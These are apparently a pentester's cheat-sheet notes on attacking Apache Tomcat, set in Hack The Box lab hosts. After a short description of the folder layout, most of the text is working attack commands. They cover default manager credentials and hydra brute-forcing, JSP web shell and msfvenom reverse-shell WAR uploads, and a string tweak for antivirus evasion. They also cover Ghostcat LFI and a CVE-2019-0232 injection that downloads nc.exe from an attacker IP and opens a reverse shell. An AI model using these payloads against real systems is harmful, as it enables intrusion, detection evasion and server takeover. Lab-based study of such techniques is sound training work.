Tomcat

General folder structure of a Tomcat installation

├── bin
├── conf
│   ├── catalina.policy
│   ├── catalina.properties
│   ├── context.xml
│   ├── tomcat-users.xml
│   ├── tomcat-users.xsd
│   └── web.xml
├── lib
├── logs
├── temp
├── webapps
│   ├── manager
│   │   ├── images
│   │   ├── META-INF
│   │   └── WEB-INF
|   |       └── web.xml
│   └── ROOT
│       └── WEB-INF
└── work
    └── Catalina
        └── localhost

The bin folder stores scripts and binaries needed to start and run a Tomcat server.

The conf folder stores various configuration files used by Tomcat.

The tomcat-users.xml file stores user credentials and their assigned roles.

The lib folder holds the various JAR files needed for the correct functioning of Tomcat. The logs and temp folders store temporary log files.

The webapps folder is the default webroot of Tomcat and hosts all the applications.

The work folder acts as a cache and is used to store data during runtime.

Each folder inside webapps is expected to have the following structure.

webapps/customapp
├── images
├── index.jsp
├── META-INF
│   └── context.xml
├── status.xsd
└── WEB-INF
    ├── jsp
    |   └── admin.jsp
    └── web.xml
    └── lib
    |    └── jdbc_drivers.jar
    └── classes
        └── AdminServlet.class   
       

he most important file among these is WEB-INF/web.xml stores information about the routes used by the application and the classes handling these routes. Any vulnerability in these files can lead to total compromise of the website.

Jakarta Server Pages (JSP), formerly known as JavaServer Pages, which can be compared to PHP files on an Apache server.

Discovery/Footprinting

The web.xml descriptor holds a lot of sensitive information and is an important file to check when leveraging a Local File Inclusion (LFI) vulnerability.

Tomcat Version

https://academy.hackthebox.com/storage/modules/113/tomcat_invalid.png

#Get tomcat version
Intrusionz3r0@htb[/htb]$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat 

Default Credentials

The /manager/html directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:

• admin:admin

• tomcat:tomcat

• admin:

• admin:s3cr3t

• tomcat:s3cr3t

• admin:tomcat

Wordlist:

• /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt

• /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

#Brute force attack
Intrusionz3r0@htb[/htb]$ hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt -f web01.inlanefreight.local http-get /manager/html

Bruteforce Script

https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce

Tomcat Manager - WAR File Upload

Intrusionz3r0@htb[/htb]$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
Intrusionz3r0@htb[/htb]$ zip -r backup.war cmd.jsp 
#Upload the malicious file
Intrusionz3r0@htb[/htb]$ curl -s 'http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=ls'

Using MSFVenom to create .war file. (The web shell as is only gets detected by 2/58 anti-virus vendors.)

Intrusionz3r0@htb[/htb]$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war

A simple change such as changing:

FileOutputStream(f);stream.write(m);o="Uploaded:

to:

FileOutputStream(f);stream.write(m);o="uPlOaDeD:

results in 0/58 security vendors flagging the cmd.jsp file as malicious at the time of writing.

CVE-2020-1938 : Ghostcat

All Tomcat versions before 9.0.31, 8.5.51, and 7.0.100 were found vulnerable.

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

Intrusionz3r0@htb[/htb]$ python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml 

Apache Tomcat: Important: Remote Code Execution on Windows (CVE-2019-0232)

Affected versions

• 9.0.0.M1 to 9.0.17

• 8.5.0 to 8.5.39

• 7.0.0 to 7.0.93

Intrusionz3r0@htb[/htb]$ fuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.129.47.188:8080//cgi/FUZZ.bat -t 300 -ic
Intrusionz3r0@htb[/htb]$  curl 'http://10.129.132.157:8080/cgi/cmd.bat?&c%3a\Windows\System32\certutil.exe+-urlcache+-split+-f+http%3a//10.10.14.33/nc.exe'
Intrusionz3r0@htb[/htb]$  curl 'http://10.129.132.157:8080/cgi/cmd.bat?&nc.exe+-e+cmd.exe+10.10.14.33+1234'